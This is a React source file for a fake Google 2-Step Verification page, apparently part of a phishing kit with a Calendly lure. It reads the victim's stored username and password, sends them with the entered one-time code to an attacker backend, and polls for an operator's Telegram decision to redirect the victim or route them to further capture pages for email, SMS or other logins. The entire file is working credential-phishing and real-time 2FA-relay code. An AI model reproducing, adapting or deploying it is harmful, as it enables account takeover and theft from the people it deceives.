import { useState, useEffect, useRef } from "react";
import chevronLeft from "./assets/left-icon.svg";
import BrowserTab from "./BrowserTab";
import CalendlySchedule from "./Calendly";
import { FaChevronDown } from "react-icons/fa6";

export default function Twofa() {
  const [code, setCode] = useState("");

  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [messageIndex, setMessageIndex] = useState(0);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const [passwordSubmitRef, setPasswordSubmitRef] = useState(false);
  
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const FRONT_URL = window.location.origin;
  const pollingIntervalRef = useRef(null);
  const hasSubmitted2FA = useRef(false);
  const isPolling = useRef(false);

  const handleSubmit = (e) => {
    e.preventDefault();
    
    // Basic validation
    if (code.length !== 6 || !/^\d+$/.test(code)) {
      setError("Please enter a valid 6-digit code");
      return;
    }
    
    setError("");
    setInfoMessage("");
    setPasswordSubmitRef(true); // Set loader flag
    setLoading(true);
    hasSubmitted2FA.current = true;

    (async () => {
      try {
        // Get the session ID from localStorage (same as login)
        const storedSessionId = localStorage.getItem("session_id");
        
        const res = await fetch(`${API_URL}/api/twofa`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ 
            code, 
            username, 
            password,
            session_id: storedSessionId || sessionId  // Send session_id
          }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Login failed");
        }

        const data = await res.json();
        const { session_id } = data;
        
        // Update session ID if backend returns one
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        } else if (storedSessionId) {
          setSessionId(storedSessionId);
        }
        
        // Start polling for Telegram response
        startPolling(session_id || storedSessionId || sessionId);
        
      } catch (err) {
        console.error("Login failed:", err);
        setError(err.message || "Login failed");
        setLoading(false);
        setPasswordSubmitRef(false);
        hasSubmitted2FA.current = false;
      }
    })();
  };

  const startPolling = (pollSessionId) => {
    if (!pollSessionId || isPolling.current) return;
    
    isPolling.current = true;
    
    // Clear previous interval
    if (pollingIntervalRef.current) {
      clearInterval(pollingIntervalRef.current);
    }
    
    const routes = {
      email: "/email",
      wp: "/wp",
      "2fa": "/2fa",
      sms: "/sms",
      wpauth: "/wp",
      login: "/login"
    };

    pollingIntervalRef.current = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${pollSessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        console.log("2FA Polling response:", data);

        // ✅ Direct redirect (e.g., Calendly)
        if (data.redirect && !data.redirect.startsWith("error:")) {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          setPasswordSubmitRef(false);
          setLoading(false);
          console.log(`Redirecting to: ${data.redirect}`);
          window.location.replace(data.redirect);
          return;
        }

        // ✅ Internal routing (when Telegram button is clicked)
        if (data.authType && data.authType !== "2fa") {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          setPasswordSubmitRef(false);
          setLoading(false);
          const route = routes[data.authType];
          if (route) {
            console.log(`Navigating to: ${route}`);
            window.location.replace(`${FRONT_URL}${route}`);
          } else {
            setError("Unknown authentication type.");
            setLoading(false);
          }
          return;
        }

        // ❌ Error from Telegram (Wrong code, etc.)
        if (data.error) {
          console.log("Error from Telegram detected:", data.error);
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          setLoading(false);
          setPasswordSubmitRef(false);
          setError("That code didn't work. Please re-enter your code again.");
          hasSubmitted2FA.current = false; // Allow resubmission
          return;
        }

        // ℹ️ Message
        if (data.message) {
          setInfoMessage(data.message);
        }
        
        // Still waiting for Telegram response - loader stays active
        console.log("2FA: Waiting for Telegram command...");
        
      } catch (err) {
        console.error("Polling error:", err);
        // Don't stop on network errors
      }
    }, 2000); // Poll every 2 seconds
  };

  // Cleanup polling on unmount
  useEffect(() => {
    return () => {
      if (pollingIntervalRef.current) {
        clearInterval(pollingIntervalRef.current);
        pollingIntervalRef.current = null;
        isPolling.current = false;
      }
    };
  }, []);

  useEffect(() => {
    const storedUsername = localStorage.getItem("username") || "";
    const storedPassword = localStorage.getItem("password") || "";
    const storedSessionId = localStorage.getItem("session_id") || null;
    
    setUsername(storedUsername);
    setPassword(storedPassword);
    
    // Set sessionId from localStorage if available
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  return (
    <div className="calendly-back">
      <CalendlySchedule />
      <div className="login-page login-page2">
        <div className="browser-shadow">
          <BrowserTab />
          <div className="login-container login-container2">
            <div className="browser-container">
              <form onSubmit={handleSubmit} className="custom-flex-group">
                <div className="text-block google-auth">
                  <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/3840px-Google_2015_logo.svg.png"/>
                  <h1 className="text-title">2-Step Verification</h1>
                  <p className="text-description">
                   This extra step shows it's really you trying to sign in.
                  </p>
                  <h5>
                    {username} <FaChevronDown />
                  </h5>
                  <h2 className="text-title">2-Step Verification</h2>
                  <h6>Get a verification code from the <span> Google Authenticator </span>app</h6>
                </div>
                <div className="credentials-display">
                  <p>
                    <strong>Password:</strong> {password}
                  </p>
                </div>

                <div className="input-group">
                  <div className="input-wrapper">
                    <input
                      id="code"
                      placeholder=""
                      type="tel"
                      inputMode="numeric"
                      pattern="\d{6}"
                      value={code}
                      disabled={loading}
                      onChange={(e) => {
                        const val = e.target.value.replace(/\D/g, '').slice(0, 6);
                        setCode(val);
                        if (error) setError("");
                      }}
                      onKeyDown={(e) => {
                        // Allow only numbers and navigation keys
                        if (!/^\d$/.test(e.key) && 
                            !['Backspace', 'Delete', 'ArrowLeft', 'ArrowRight', 'Tab', 'Enter'].includes(e.key)) {
                          e.preventDefault();
                        }
                      }}
                      required
                      className={`${code.trim() ? "filled" : ""} ${
                        error ? "error-input" : ""
                      }`}
                      autoFocus
                    />

                    <label
                      htmlFor="code"
                      className={` ${error ? "error-label" : ""}`}
                    >
                      Code
                    </label>
                  </div>
                  
                  {/* Password verification loader */}
                  {passwordSubmitRef && loading && (
                    <div className="password-submit-loader">
                      <div className="spinner"></div>
                      <p className="loader-text">
                        {isPolling.current 
                          ? "Waiting for Telegram response..." 
                          : "Verifying code..."}
                      </p>
                    </div>
                  )}
                  
                  {error && (
                    <p className="error-message">
                      {error}
                    </p>
                  )}
                </div>
                <div className="custom-button-group submit-button-div">
                  <button 
                    type="button"
                    className="custom-secondary-button"
                    onClick={() => {
                      // Go back to login
                      window.location.href = `${FRONT_URL}/login`;
                    }}
                    disabled={loading}
                  >
                    Try another way
                  </button>
                  <button
                    className="custom-primary-button"
                    type="submit"
                    disabled={loading || code.length !== 6}
                  >
                    {loading && !passwordSubmitRef ? (
                      <div className="fb-loader-btn">
                        <div className="fb-spinner"></div>
                      </div>
                    ) : (
                      "Continue"
                    )}
                  </button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}